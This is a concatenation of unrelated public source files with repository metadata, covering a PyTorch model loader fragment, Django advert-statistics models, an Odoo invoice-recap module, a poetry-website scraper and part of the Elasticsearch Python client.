def get_vgg16(checkpoint):
"""Create model."""
model = VGG16()
model_load(model, checkpoint, prefix="")
return model
def get_refiner():
model = StyleGANRefiner()
model_load(model.encoder, "models/stylegan2_encoder.pth", prefix="")
model_load(model.decoder, "models/stylegan2_decoder.pth", prefix="synthesis.")
model_load(model.vgg16, "models/stylegan2_vgg16.pth", prefix="")
return model
def model_device():
"""Please call after model_setenv."""
return torch.device(os.environ["DEVICE"])
def model_setenv():
"""Setup environ ..."""
# random init ...
import random
random.seed(42)
torch.manual_seed(42)
# Set default device to avoid exceptions
if os.environ.get("DEVICE") != "cuda" and os.environ.get("DEVICE") != "cpu":
os.environ["DEVICE"] = "cuda" if torch.cuda.is_available() else "cpu"
if os.environ["DEVICE"] == "cuda":
torch.backends.cudnn.enabled = True
torch.backends.cudnn.benchmark = True
print("Running Environment:")
print("----------------------------------------------")
print(" PWD: ", os.environ["PWD"])
print(" DEVICE: ", os.environ["DEVICE"])
| [
"18588220928@163.com"
] | 18588220928@163.com |
f8dfb8754afe031d0868f8fefdf0e6c12c094aa0 | bea2cd0fdfe792fdc07acece472a14ff650d5663 | /adsys/adverthistory/models.py | 6296ce94b5e1d4c8d767b9f0c9917ef4ef62d92a | [] | no_license | kostadinoval/django-adsys | 5fcf1a1263c1a59a73460a2d614125159b079faa | ecef78830b7f8d68a68148e7108ec40cc1414453 | refs/heads/master | 2021-01-10T07:56:53.913781 | 2015-11-28T18:26:00 | 2015-11-28T18:26:00 | 46,121,070 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 572 | py | from django.db import models
from advert.models import Advert
class AdvertImpression(models.Model):
advert = models.ForeignKey(Advert)
numberOfImpressions = models.IntegerField(default = 0)
def __unicode__(self):
return "Advert: " + str(self.advert) + " - " + "Number of impressions: " + str(self.numberOfImpressions)
class AdvertClick(models.Model):
advert = models.ForeignKey(Advert)
numberOfClicks = models.IntegerField(default = 0)
def __unicode__(self):
return "Advert: " + str(self.advert) + " - " + "Number of clicks: " + str(self.numberOfClicks)
| [
"aleksandar.kostadinov@hotmail.co.uk"
] | aleksandar.kostadinov@hotmail.co.uk |
4b7332355084b28ef509efbcfa0245ab7dafc7c7 | eb82022c0cfc7c8747661cff9624ad2099fa1c3f | /dev_recap_invoice/models/recap_invoice.py | 49c018ea5e561d7472a9a8bf5373cc7adc07fe2e | [] | no_license | dadysuarsa/Odoo | 8d026a066c390cc8f72805d2672212e61260c1cb | c9becd0c192fa239520ad3e1a11d81f70832eddf | refs/heads/master | 2023-03-11T06:02:06.011575 | 2021-02-26T02:17:37 | 2021-02-26T02:17:37 | 276,346,540 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 18,488 | py |
# -*- coding: utf-8 -*-
from odoo import models, fields, api,_
from odoo.exceptions import UserError, Warning
from odoo.tools import float_is_zero, float_compare, DEFAULT_SERVER_DATETIME_FORMAT
from odoo.tools.misc import formatLang
from odoo import time
from datetime import datetime
from openerp.tools import amount_to_text_en
class AccountInvoice(models.Model):
_inherit = 'account.invoice'
ship_mode = fields.Selection([
('1','By air'),
('2','By sea'),
('3','By sea air')
],string="Ship Mode")
class recapinvoice(models.Model):
_name = 'invoice.recap'
name = fields.Char(string="No Invoice", readonly=True, default="NEW")
date_trans = fields.Datetime(string='Date Transaction', required=True, index=True, copy=False,
default=fields.Datetime.now)
company_id = fields.Many2one('res.company', ondelete='set null',string='Company Id',index=True,default=lambda self: self.env['res.company']._company_default_get('invoice.recap'))
user_id = fields.Many2one('res.users',string='User id ', index=True, track_visibility='onchange', default=lambda self: self.env.user)
state= fields.Selection([
('draft',"Draft"),
('done',"Done"),
], string="Status", readonly=True,copy=False,index=True,default='draft')
matauang = fields.Char(string="Currency")
total = fields.Float(string="Untax Amount",store=True, readonly=True, compute='_njmlnilai', track_visibility='always')
invoicerecapline_line = fields.One2many("invoice.recap.line","invoicerecap_line")
accountinv_id = fields.Many2one("account.invoice", string="Invoice Number", domain=[('type','=','out_invoice')])
customer_name = fields.Char(related="accountinv_id.partner_id.name", string="Customer")
ppn = fields.Float(string="Tax",compute="_njmlnilaippn", store=True )
jumlahtotal = fields.Float(string="Total",compute="_njmlnilaigab", store=True )
no_sj = fields.Char(string="Delivery Number")
#pricelist_id = fields.Many2one('product.pricelist', string='Pricelist', required=True, readonly=True, states={'draft': [('readonly', False)], 'sent': [('readonly', False)]}, help="Pricelist for current sales order.")
#total = fields.Monetary(string='Untaxed Amount', store=True, readonly=True, compute='_njmlnilai', track_visibility='always')
#ppn = fields.Monetary(string='Taxes', store=True, readonly=True, compute='_njmlnilaippn', track_visibility='always')
#jumlahtotal = fields.Monetary(string='Total', store=True, readonly=True, compute='_njmlnilaigab', track_visibility='always')
currency_id = fields.Many2one(related='accountinv_id.currency_id', store=True, string='Currency', readonly=True)
transportation = fields.Char(string="Transportation")
sum_qty = fields.Float(string="SUM qty",compute="_sum_qty",store=True)
sum_kemasan = fields.Float(string="SUM Kemasan",compute="_sum_qty",store=True)
#nosj = fields.Many2one(related='accountinv_id.picking_id',string="Delivery Order Number", store=True)
divisi = fields.Selection([
('textile','TEXTILE'),
('garment','GARMENT'),
], string='Division', default='textile')
ship_mode = fields.Selection([
('1','By air'),
('2','By sea'),
('3','By sea air')
],string="Ship Mode")
ref = fields.Char('REF', help="REF ")
# qty_g = fields.Float(string='Qty')
# satuan_g = fields.Char(string='Unit')
# qty_kemasan_g = fields.Integer(string='Qty Kemasan')
# satuan_kemasan_g = fields.Char(string='Unit Kemasan')
# @api.multi
# def validate(self, vals):
# c=''
# if self.divisi=='textile':
# c='1'
# if self.divisi=='garment':
# c='2'
# now=datetime.now()
# month = now.strftime("%m")
# year=now.strftime("%y")
# nmsequencesj=month+year
# nmsequence=month+year
# cdivisi=c+"ROUT"
# # vals['no_sj'] = self.env['ir.sequence'].get_sequence('nosjrecap',nmsequencesj,cdivisi+'%(y)s%(month)s',4)
# csj=self.env['ir.sequence'].get_sequence('nosjrecap',nmsequencesj,cdivisi+'%(y)s%(month)s',4)
# cinv=self.env['ir.sequence'].get_sequence('noinvrecap',nmsequence,'INV-R/%(month)s/%(y)s/',4)
# # vals['name'] = self.env['ir.sequence'].get_sequence('noinvrecap',nmsequence,'INV-R/%(month)s/%(y)s/',4)
# cvalidate = self.write({'state':'done',})
# isi_sj = self.write({'no_sj':csj,})
# isi_inv = self.write({'name':cinv,})
# # return super(recapinvoice, self).create(vals)
# return cvalidate
# return isi_sj
# return isi_inv
# if not self.invoicerecapline_line:
# raise UserError('Details Cannot Be Empty')
# cvalidate = self.write({'state':'done',})
@api.model
def create(self, vals):
if not self.invoicerecapline_line:
now=datetime.now()
month = now.strftime("%m")
year=now.strftime("%y")
nmsequencesj=month+year
nmsequence=month+year
company_code = self.env.user.company_id.code_company
cdivisi=company_code+"ROUT"
vals['no_sj'] = self.env['ir.sequence'].get_sequence('nosjrecap',nmsequencesj,cdivisi+'%(y)s%(month)s',4)
vals['name'] = self.env['ir.sequence'].get_sequence('noinvrecap',nmsequence,'INV-R/%(month)s/%(y)s/',4)
return super(recapinvoice, self).create(vals)
#==================
# @api.model
# def create1(self, vals):
# raise UserError('inv')
# now=datetime.now()
# month = now.strftime("%m")
# year=now.strftime("%y")
# nmsequence=month+year
# vals['name'] = self.env['ir.sequence'].get_sequence('noinvrecap',nmsequence,'INV-R/%(month)s/%(y)s/',4)
# return super(recapinvoice, self).create(vals)
#================
@api.multi
def validate(self):
if not self.invoicerecapline_line:
raise UserError('Details Cannot Be Empty')
if self.invoicerecapline_line:
list_of_inv_distinct =[]
list_of_inv_distinct[:] =[]
list_of_inv = [x.noinvoice for x in self.invoicerecapline_line]
for a in list_of_inv:
if a not in list_of_inv_distinct:
list_of_inv_distinct.append(a)
rec_inv = self.env['account.invoice'].search([('number','in',list_of_inv_distinct)])
for r in rec_inv:
r.write({'ship_mode':self.ship_mode})
cvalidate = self.write({'state':'done',})
return cvalidate
@api.depends('invoicerecapline_line','accountinv_id')
def _njmlnilai(self):
for rec in self:
x=sum([att.total for att in rec.invoicerecapline_line])
rec.total=x
#raise UserError(x)
#rec.update({'total': rec.pricelist_id.currency_id.round(x)})
@api.depends('invoicerecapline_line','accountinv_id')
def _njmlnilaippn(self):
d=[t.noinvoice for t in self.invoicerecapline_line]
#raise UserError(list1)
accinv=self.env['account.invoice'].search([('number','=',d)])
c=sum([p.amount_tax for p in accinv])
#raise UserError(c)
self.ppn=c
#self.update({'ppn': self.pricelist_id.currency_id.round(c)})
@api.depends('invoicerecapline_line','accountinv_id')
def _njmlnilaigab(self):
ntotal=self.ppn+self.total
self.jumlahtotal=ntotal
#self.update({'jumlahtotal': self.pricelist_id.currency_id.round(ntotal)})
# def _isirecord(self,crec,noinv):
# rincianinvoice = self.env['invoice.recap.line']
# data = {'invoicerecap_line': self.id,
# 'no_mo': crec.no_mo,
# 'no_design':crec.no_design,
# 'no_design_buyer':crec.no_design_buyer,
# 'color':crec.color,
# 'product_id':crec.product_id,
# 'cost_center_id':crec.cost_center_id,
# 'qty':crec.quantity,
# 'price':crec.price_unit,
# 'total':crec.price_subtotal,
# 'noinvoice':noinv.number,
# 'account':crec.account_id,
# 'cost_center_id':crec.cost_center_id,
# 'inv_line_id':crec.id,
# 'nosj':noinv.picking_id.name
# }
# return data
@api.onchange('accountinv_id')
def _gabunginv(self):
ckemasan=''
cjmlkemasan=0
company_code = self.env.user.company_id.code_company
if company_code=='1':
if self.accountinv_id:
isiinv = self.env['account.invoice.line'].search([('invoice_id','=',self.accountinv_id.id)])
#self.accountinv_id.id
#raise UserError(isiinv)
for crec in isiinv:
cariinv = self.env['account.invoice'].search([('id', '=',crec.invoice_id.id)])
cekkemasan = self.env['stock.picking'].search([('id','=',cariinv.picking_id.id)])
# for r in cekkemasan.kemasan_line:
# ckemasan = r.jenis_kemasan_id.name
# cjmlkemasan = r.qty
# raise UserError(crec.uom_id.name)
for noinv in cariinv:
cekinv = self.env['invoice.recap.line'].search([('noinvoice','=',crec.invoice_id.number),('product_id','=',crec.product_id.id),('state','!=','')])
#cek_orderline = self.env['invoicerecapline_line'].search([('noinvoice','=',crec.invoice_id.number),('product_id','=',crec.product_id.id)])
if not cekinv:
values = self.env['invoice.recap.line'].new({'no_mo': crec.no_mo,'no_design':crec.no_design,'no_design_buyer':crec.no_design_buyer,
'color':crec.color,
'product_id':crec.product_id,
'cost_center_id':crec.cost_center_id,
'qty':crec.quantity,
'price':crec.price_unit,
'total':crec.price_subtotal,
'noinvoice':noinv.number,
'account':crec.account_id,
'cost_center_id':crec.cost_center_id,
'inv_line_id':crec.id,
'nosj':noinv.picking_id.name,
'satuan_id':crec.uom_id.id,
'destinasi_id':cariinv.name_destination.id
})
self.invoicerecapline_line += values
else:
if self.accountinv_id:
query="""
select a.id,a.name_destination as destinasi,b.product_id,b.name,b.invoice_id,b.account_id,b.uom_id as satuan,b.price_unit as harga,sum(b.quantity) as jmlqty,sum(b.price_subtotal) as nilaitotal
from account_invoice a
inner join account_invoice_line b on a.id=b.invoice_id where invoice_id=%s group by a.id,b.invoice_id,b.product_id,b.name,b.account_id,b.uom_id,b.price_unit
"""
tes= self._cr.execute(query,(self.accountinv_id.id,))
# tes=self.env.cr.fetchall()
tes=self.env.cr.dictfetchall()
for grm in tes:
# for grm in self.env.cr.dictfetchall():
values = self.env['invoice.recap.line'].new({
'product_id':grm['product_id'],
'description':grm['name'],
'qty':grm['jmlqty'],
'total':grm['nilaitotal'],
'noinvoice':self.accountinv_id.number,
'account':grm['account_id'],
'price':grm['harga'],
# 'nosj':noinv.picking_id.name,
# 'qty_kemasan':cjmlkemasan,
# 'jenis_kemasan':ckemasan,
'satuan_id':grm['satuan'],
'destinasi_id':grm['destinasi']
})
self.invoicerecapline_line += values
# def _gabunginv(self): #original sebelum tambah cetakan yg sj garment
# if self.divisi=='textile':
# if self.accountinv_id:
# isiinv = self.env['account.invoice.line'].search([('invoice_id','=',self.accountinv_id.id)])
# #self.accountinv_id.id
# #raise UserError(isiinv)
# for crec in isiinv:
# cariinv = self.env['account.invoice'].search([('id', '=',crec.invoice_id.id)])
# # new_lines = self.env['invoice.recap.line']
# for noinv in cariinv:
# cekinv = self.env['invoice.recap.line'].search([('noinvoice','=',crec.invoice_id.number),('product_id','=',crec.product_id.id),('state','!=','')])
# #cek_orderline = self.env['invoicerecapline_line'].search([('noinvoice','=',crec.invoice_id.number),('product_id','=',crec.product_id.id)])
# if not cekinv:
# # data = self._isirecord(crec,noinv)
# # new_line = new_lines.new(data)
# # new_line._set_additional_fields()
# # new_lines += new_line
# values = self.env['invoice.recap.line'].new({'no_mo': crec.no_mo,'no_design':crec.no_design,'no_design_buyer':crec.no_design_buyer,
# 'color':crec.color,
# 'product_id':crec.product_id,
# 'cost_center_id':crec.cost_center_id,
# 'qty':crec.quantity,
# 'price':crec.price_unit,
# 'total':crec.price_subtotal,
# 'noinvoice':noinv.number,
# 'account':crec.account_id,
# 'cost_center_id':crec.cost_center_id,
# 'inv_line_id':crec.id,
# 'nosj':noinv.picking_id.name
# })
# self.invoicerecapline_line += values #batas original sebelum tambah cetakan yg sj garment
## else:
## cariinv=self.env['account.invoice'].search([('picking_id','=',self.accountinv_id.picking_id.id)])
## raise UserError(cariinv.picking_id.id)
@api.multi
def _updateinvgabungan(self):
filterinv = self.env['invoice.recap.line'].search([('name','=',self.name)])
#raise UserError(filterinv.noinvoice)
for rec in filterinv:
if rec :
x=self.env['account.invoice'].search([('number','=',rec.noinvoice)])
x.write({'invoice_gabungan':self.name})
#raise UserError(rec.noinvoice)
@api.depends("invoicerecapline_line")
def _sum_qty(self):
nqty1=0
nqty2=0
for r in self:
for z in r.invoicerecapline_line:
nqty1+=z.qty
nqty2+=z.qty_kemasan
r.sum_qty=nqty1
r.sum_kemasan = nqty2
@api.one
def action_change(self):
res = self.write({
'name':self.ref,
})
return res
# @api.depends("invoicerecapline_line")
# def sum_qty_kemasan(self):
# nqty2=0
# for z in self.invoicerecapline_line:
# nqty2+=z.qty_kemasan
# self.sum_kemasan=nqty2
@api.multi
def todraft(self):
if self.state =='done':
res = self.write({
'state':'draft',
})
return res
class recapinvoiceline(models.Model):
_name = 'invoice.recap.line'
name = fields.Char(related="invoicerecap_line.name", store=True)
no_mo = fields.Char(string="Order No")
no_design = fields.Char(string="Design No")
no_design_buyer = fields.Char(string="Design Buyer")
color = fields.Char(string="Color")
description = fields.Char(string="Description")
account = fields.Many2one("account.account",string="Account")
product_id = fields.Many2one("product.product", string="Product")
cost_center_id = fields.Many2one("account.cost.center",string="Cost Center")
invoice_tax = fields.Many2one("account.tax",string="Tax",readonly=True)
noinvoice = fields.Char(string="Invoice Number")
nosj = fields.Char(string="Delivery Order Number")
nama_barang = fields.Char(related="product_id.name")
price = fields.Float(string="Price", readonly=True)
qty = fields.Float(string="Quantity", readonly=True)
total = fields.Float(string="Total", readonly=True)
invoicerecap_line = fields.Many2one("invoice.recap", ondelete='cascade', index=True, copy=False)
state = fields.Selection(related="invoicerecap_line.state", store=True)
#noinvoice_gabungan = fields.Char(related="invoicerecap_line.name", store=True)
date_trans = fields.Datetime(string='Date Transaction', required=True, index=True, copy=False,
default=fields.Datetime.now)
company_id = fields.Many2one('res.company', ondelete='set null',string='Company Id',index=True,default=lambda self: self.env['res.company']._company_default_get('invoice.recap.line'))
user_id = fields.Many2one('res.users',string='User id ', index=True, track_visibility='onchange', default=lambda self: self.env.user)
inv_line_id = fields.Integer()
keterangan = fields.Char(string="Keterangan")
qty_kemasan = fields.Float(string='Packing Qty')
jenis_kemasan = fields.Many2one("jenis.kemasan",string='Packing')
satuan_id = fields.Many2one("product.uom",string="Unit")
destinasi_id = fields.Many2one("master.destination.line",string="Destination")
# def _set_additional_fields(self):
# pass | [
"dads02_zetti@yahoo.com"
] | dads02_zetti@yahoo.com |
2eeed853918df0de5ab7cec3d171e4774f6d87a9 | 148e05840285e37ea9f08d654fbc7746df25f149 | /poem_parser/poetryminute.py | 404747e51d6e95aa79808795f91c040e40c0db8d | [] | no_license | jedmitten/poem_parser | 2d6828450f6ec6544fa75cb89f1e08a160e4b645 | a02db8bc5909a0a3ebc1f9bd17b1a72b251b1781 | refs/heads/master | 2022-12-09T07:00:37.287677 | 2019-10-21T17:27:59 | 2019-10-21T17:27:59 | 152,363,685 | 0 | 0 | null | 2019-10-21T17:28:00 | 2018-10-10T04:36:43 | Python | UTF-8 | Python | false | false | 1,819 | py | import requests
from bs4 import BeautifulSoup
BASE_URL = 'http://www.poetryminute.org'
AUTHOR = 'author'
DATE = 'date'
CATEGORY = 'category'
TITLE = 'title'
BASE_DIR = 'poems-by'
DIRS = {
AUTHOR: '-'.join([BASE_DIR, AUTHOR]),
DATE: '-'.join([BASE_DIR, DATE]),
# CATEGORY: '-'.join([BASE_DIR, CATEGORY]),
TITLE: '-'.join([BASE_DIR, TITLE])
}
BLOG_DIV = 'blog_div_text'
def get_poems():
collection = {}
for poem_dir in DIRS:
full_url = '/'.join([BASE_URL, DIRS[poem_dir]])
resp = requests.get(full_url)
soup = BeautifulSoup(resp.content, 'html.parser')
div = soup.find(attrs={"class": BLOG_DIV}).children
category = ''
d_category = {}
for child in div:
if child.name == 'h2':
category = child.string
elif child.name == 'ul':
for li in child.find_all('li'):
l_poems = d_category.get(category, [])
link = li.a['href']
text = li.string or li.text
text = text.replace('\xa0', ' ')
if ' by ' in text:
title, author = text.rsplit(' by ', 1)
else:
title = text
author = ''
if poem_dir == AUTHOR:
author = category
d = {
'link': link,
'title': title,
'author': author,
}
l_poems.append(d)
d_category[category] = l_poems
# elif child.next == 'h2':
# collection[month] = d
else:
continue
collection[poem_dir] = d_category
return collection
| [
"jmitten@obsidiansecurity.com"
] | jmitten@obsidiansecurity.com |
a3d5611e64e5372b7311db438c29c731f14d8d8a | cbfcbbfa606c16d5051f9f202bc3421e60192a9e | /elasticsearch7/client/__init__.py | 59fbaa8b6f776a6aeef5d765d46c1f46fda3778f | [
"MIT"
] | permissive | RitterHou/search_platform | d7292e229bc7ee2a521cdcd8a6ce2d8f2e5ba38a | a72b4e4d78b4375f69887e75abcc1e6a6782c551 | refs/heads/production_es7 | 2023-08-23T17:29:25.224031 | 2021-10-12T06:16:56 | 2021-10-12T06:16:56 | 416,202,756 | 0 | 0 | null | 2021-10-12T06:16:56 | 2021-10-12T05:54:40 | Python | UTF-8 | Python | false | false | 84,424 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
import logging
from ..transport import Transport
from ..exceptions import TransportError
from ..compat import string_types, urlparse, unquote
from .indices import IndicesClient
from .ingest import IngestClient
from .cluster import ClusterClient
from .cat import CatClient
from .nodes import NodesClient
from .remote import RemoteClient
from .snapshot import SnapshotClient
from .tasks import TasksClient
from .xpack import XPackClient
from .utils import query_params, _make_path, SKIP_IN_PATH, _bulk_body
# xpack APIs
from .ccr import CcrClient
from .data_frame import Data_FrameClient
from .deprecation import DeprecationClient
from .graph import GraphClient
from .ilm import IlmClient
from .license import LicenseClient
from .migration import MigrationClient
from .ml import MlClient
from .monitoring import MonitoringClient
from .rollup import RollupClient
from .security import SecurityClient
from .sql import SqlClient
from .ssl import SslClient
from .watcher import WatcherClient
from .enrich import EnrichClient
from .slm import SlmClient
from .transform import TransformClient
logger = logging.getLogger("elasticsearch")
def _normalize_hosts(hosts):
"""
Helper function to transform hosts argument to
:class:`~elasticsearch.Elasticsearch` to a list of dicts.
"""
# if hosts are empty, just defer to defaults down the line
if hosts is None:
return [{}]
# passed in just one string
if isinstance(hosts, string_types):
hosts = [hosts]
out = []
# normalize hosts to dicts
for host in hosts:
if isinstance(host, string_types):
if "://" not in host:
host = "//%s" % host
parsed_url = urlparse(host)
h = {"host": parsed_url.hostname}
if parsed_url.port:
h["port"] = parsed_url.port
if parsed_url.scheme == "https":
h["port"] = parsed_url.port or 443
h["use_ssl"] = True
if parsed_url.username or parsed_url.password:
h["http_auth"] = "%s:%s" % (
unquote(parsed_url.username),
unquote(parsed_url.password),
)
if parsed_url.path and parsed_url.path != "/":
h["url_prefix"] = parsed_url.path
out.append(h)
else:
out.append(host)
return out
class Elasticsearch(object):
"""
Elasticsearch low-level client. Provides a straightforward mapping from
Python to ES REST endpoints.
The instance has attributes ``cat``, ``cluster``, ``indices``, ``ingest``,
``nodes``, ``snapshot`` and ``tasks`` that provide access to instances of
:class:`~elasticsearch.client.CatClient`,
:class:`~elasticsearch.client.ClusterClient`,
:class:`~elasticsearch.client.IndicesClient`,
:class:`~elasticsearch.client.IngestClient`,
:class:`~elasticsearch.client.NodesClient`,
:class:`~elasticsearch.client.SnapshotClient` and
:class:`~elasticsearch.client.TasksClient` respectively. This is the
preferred (and only supported) way to get access to those classes and their
methods.
You can specify your own connection class which should be used by providing
the ``connection_class`` parameter::
# create connection to localhost using the ThriftConnection
es = Elasticsearch(connection_class=ThriftConnection)
If you want to turn on :ref:`sniffing` you have several options (described
in :class:`~elasticsearch.Transport`)::
# create connection that will automatically inspect the cluster to get
# the list of active nodes. Start with nodes running on 'esnode1' and
# 'esnode2'
es = Elasticsearch(
['esnode1', 'esnode2'],
# sniff before doing anything
sniff_on_start=True,
# refresh nodes after a node fails to respond
sniff_on_connection_fail=True,
# and also every 60 seconds
sniffer_timeout=60
)
Different hosts can have different parameters, use a dictionary per node to
specify those::
# connect to localhost directly and another node using SSL on port 443
# and an url_prefix. Note that ``port`` needs to be an int.
es = Elasticsearch([
{'host': 'localhost'},
{'host': 'othernode', 'port': 443, 'url_prefix': 'es', 'use_ssl': True},
])
If using SSL, there are several parameters that control how we deal with
certificates (see :class:`~elasticsearch.Urllib3HttpConnection` for
detailed description of the options)::
es = Elasticsearch(
['localhost:443', 'other_host:443'],
# turn on SSL
use_ssl=True,
# make sure we verify SSL certificates
verify_certs=True,
# provide a path to CA certs on disk
ca_certs='/path/to/CA_certs'
)
If using SSL, but don't verify the certs, a warning message is showed
optionally (see :class:`~elasticsearch.Urllib3HttpConnection` for
detailed description of the options)::
es = Elasticsearch(
['localhost:443', 'other_host:443'],
# turn on SSL
use_ssl=True,
# no verify SSL certificates
verify_certs=False,
# don't show warnings about ssl certs verification
ssl_show_warn=False
)
SSL client authentication is supported
(see :class:`~elasticsearch.Urllib3HttpConnection` for
detailed description of the options)::
es = Elasticsearch(
['localhost:443', 'other_host:443'],
# turn on SSL
use_ssl=True,
# make sure we verify SSL certificates
verify_certs=True,
# provide a path to CA certs on disk
ca_certs='/path/to/CA_certs',
# PEM formatted SSL client certificate
client_cert='/path/to/clientcert.pem',
# PEM formatted SSL client key
client_key='/path/to/clientkey.pem'
)
Alternatively you can use RFC-1738 formatted URLs, as long as they are not
in conflict with other options::
es = Elasticsearch(
[
'http://user:secret@localhost:9200/',
'https://user:secret@other_host:443/production'
],
verify_certs=True
)
By default, `JSONSerializer
<https://github.com/elastic/elasticsearch-py/blob/master/elasticsearch/serializer.py#L24>`_
is used to encode all outgoing requests.
However, you can implement your own custom serializer::
from elasticsearch.serializer import JSONSerializer
class SetEncoder(JSONSerializer):
def default(self, obj):
if isinstance(obj, set):
return list(obj)
if isinstance(obj, Something):
return 'CustomSomethingRepresentation'
return JSONSerializer.default(self, obj)
es = Elasticsearch(serializer=SetEncoder())
"""
def __init__(self, hosts=None, transport_class=Transport, **kwargs):
"""
:arg hosts: list of nodes, or a single node, we should connect to.
Node should be a dictionary ({"host": "localhost", "port": 9200}),
the entire dictionary will be passed to the :class:`~elasticsearch.Connection`
class as kwargs, or a string in the format of ``host[:port]`` which will be
translated to a dictionary automatically. If no value is given the
:class:`~elasticsearch.Connection` class defaults will be used.
:arg transport_class: :class:`~elasticsearch.Transport` subclass to use.
:arg kwargs: any additional arguments will be passed on to the
:class:`~elasticsearch.Transport` class and, subsequently, to the
:class:`~elasticsearch.Connection` instances.
"""
self.transport = transport_class(_normalize_hosts(hosts), **kwargs)
# namespaced clients for compatibility with API names
self.indices = IndicesClient(self)
self.ingest = IngestClient(self)
self.cluster = ClusterClient(self)
self.cat = CatClient(self)
self.nodes = NodesClient(self)
self.remote = RemoteClient(self)
self.snapshot = SnapshotClient(self)
self.tasks = TasksClient(self)
self.xpack = XPackClient(self)
self.ccr = CcrClient(self)
self.data_frame = Data_FrameClient(self)
self.deprecation = DeprecationClient(self)
self.graph = GraphClient(self)
self.ilm = IlmClient(self)
self.indices = IndicesClient(self)
self.license = LicenseClient(self)
self.migration = MigrationClient(self)
self.ml = MlClient(self)
self.monitoring = MonitoringClient(self)
self.rollup = RollupClient(self)
self.security = SecurityClient(self)
self.sql = SqlClient(self)
self.ssl = SslClient(self)
self.watcher = WatcherClient(self)
self.enrich = EnrichClient(self)
self.slm = SlmClient(self)
self.transform = TransformClient(self)
def __repr__(self):
try:
# get a list of all connections
cons = self.transport.hosts
# truncate to 5 if there are too many
if len(cons) > 5:
cons = cons[:5] + ["..."]
return "<{cls}({cons})>".format(cls=self.__class__.__name__, cons=cons)
except:
# probably operating on custom transport and connection_pool, ignore
return super(Elasticsearch, self).__repr__()
# AUTO-GENERATED-API-DEFINITIONS #
@query_params()
def ping(self, params=None):
"""
Returns whether the cluster is running.
`<https://www.elastic.co/guide/en/elasticsearch/reference/current/index.html>`_
"""
try:
return self.transport.perform_request("HEAD", "/", params=params)
except TransportError:
return False
@query_params()
def info(self, params=None):
"""
Returns basic information about the cluster.
`<https://www.elastic.co/guide/en/elasticsearch/reference/current/index.html>`_
"""
return self.transport.perform_request("GET", "/", params=params)
@query_params(
"pipeline",
"refresh",
"routing",
"timeout",
"version",
"version_type",
"wait_for_active_shards",
)
def create(self, index, id, body, doc_type=None, params=None):
"""
Creates a new document in the index. Returns a 409 response when a document
with a same ID already exists in the index.
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/docs-index_.html>`_
:arg index: The name of the index
:arg id: Document ID
:arg body: The document
:arg doc_type: The type of the document
:arg pipeline: The pipeline id to preprocess incoming documents
with
:arg refresh: If `true` then refresh the affected shards to make
this operation visible to search, if `wait_for` then wait for a refresh
to make this operation visible to search, if `false` (the default) then
do nothing with refreshes. Valid choices: true, false, wait_for
:arg routing: Specific routing value
:arg timeout: Explicit operation timeout
:arg version: Explicit version number for concurrency control
:arg version_type: Specific version type Valid choices:
internal, external, external_gte
:arg wait_for_active_shards: Sets the number of shard copies
that must be active before proceeding with the index operation. Defaults
to 1, meaning the primary shard only. Set to `all` for all shard copies,
otherwise set to any non-negative value less than or equal to the total
number of copies for the shard (number of replicas + 1)
"""
for param in (index, id, body):
if param in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument.")
if doc_type in SKIP_IN_PATH:
doc_type = "_doc"
return self.transport.perform_request(
"PUT", _make_path(index, doc_type, id, "_create"), params=params, body=body
)
@query_params(
"if_primary_term",
"if_seq_no",
"op_type",
"pipeline",
"refresh",
"routing",
"timeout",
"version",
"version_type",
"wait_for_active_shards",
)
def index(self, index, body, doc_type=None, id=None, params=None):
"""
Creates or updates a document in an index.
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/docs-index_.html>`_
:arg index: The name of the index
:arg body: The document
:arg doc_type: The type of the document
:arg id: Document ID
:arg if_primary_term: only perform the index operation if the
last operation that has changed the document has the specified primary
term
:arg if_seq_no: only perform the index operation if the last
operation that has changed the document has the specified sequence
number
:arg op_type: Explicit operation type. Defaults to `index` for
requests with an explicit document ID, and to `create`for requests
without an explicit document ID Valid choices: index, create
:arg pipeline: The pipeline id to preprocess incoming documents
with
:arg refresh: If `true` then refresh the affected shards to make
this operation visible to search, if `wait_for` then wait for a refresh
to make this operation visible to search, if `false` (the default) then
do nothing with refreshes. Valid choices: true, false, wait_for
:arg routing: Specific routing value
:arg timeout: Explicit operation timeout
:arg version: Explicit version number for concurrency control
:arg version_type: Specific version type Valid choices:
internal, external, external_gte
:arg wait_for_active_shards: Sets the number of shard copies
that must be active before proceeding with the index operation. Defaults
to 1, meaning the primary shard only. Set to `all` for all shard copies,
otherwise set to any non-negative value less than or equal to the total
number of copies for the shard (number of replicas + 1)
"""
for param in (index, body):
if param in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument.")
if doc_type is None:
doc_type = "_doc"
return self.transport.perform_request(
"POST" if id in SKIP_IN_PATH else "PUT",
_make_path(index, doc_type, id),
params=params,
body=body,
)
@query_params(
"_source",
"_source_excludes",
"_source_includes",
"pipeline",
"refresh",
"routing",
"timeout",
"wait_for_active_shards",
)
def bulk(self, body, index=None, doc_type=None, params=None):
"""
Allows to perform multiple index/update/delete operations in a single request.
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/docs-bulk.html>`_
:arg body: The operation definition and data (action-data
pairs), separated by newlines
:arg index: Default index for items which don't provide one
:arg doc_type: Default document type for items which don't
provide one
:arg _source: True or false to return the _source field or not,
or default list of fields to return, can be overridden on each sub-
request
:arg _source_excludes: Default list of fields to exclude from
the returned _source field, can be overridden on each sub-request
:arg _source_includes: Default list of fields to extract and
return from the _source field, can be overridden on each sub-request
:arg doc_type: Default document type for items which don't
provide one
:arg pipeline: The pipeline id to preprocess incoming documents
with
:arg refresh: If `true` then refresh the effected shards to make
this operation visible to search, if `wait_for` then wait for a refresh
to make this operation visible to search, if `false` (the default) then
do nothing with refreshes. Valid choices: true, false, wait_for
:arg routing: Specific routing value
:arg timeout: Explicit operation timeout
:arg wait_for_active_shards: Sets the number of shard copies
that must be active before proceeding with the bulk operation. Defaults
to 1, meaning the primary shard only. Set to `all` for all shard copies,
otherwise set to any non-negative value less than or equal to the total
number of copies for the shard (number of replicas + 1)
"""
if body in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'body'.")
body = _bulk_body(self.transport.serializer, body)
return self.transport.perform_request(
"POST", _make_path(index, doc_type, "_bulk"), params=params, body=body
)
@query_params()
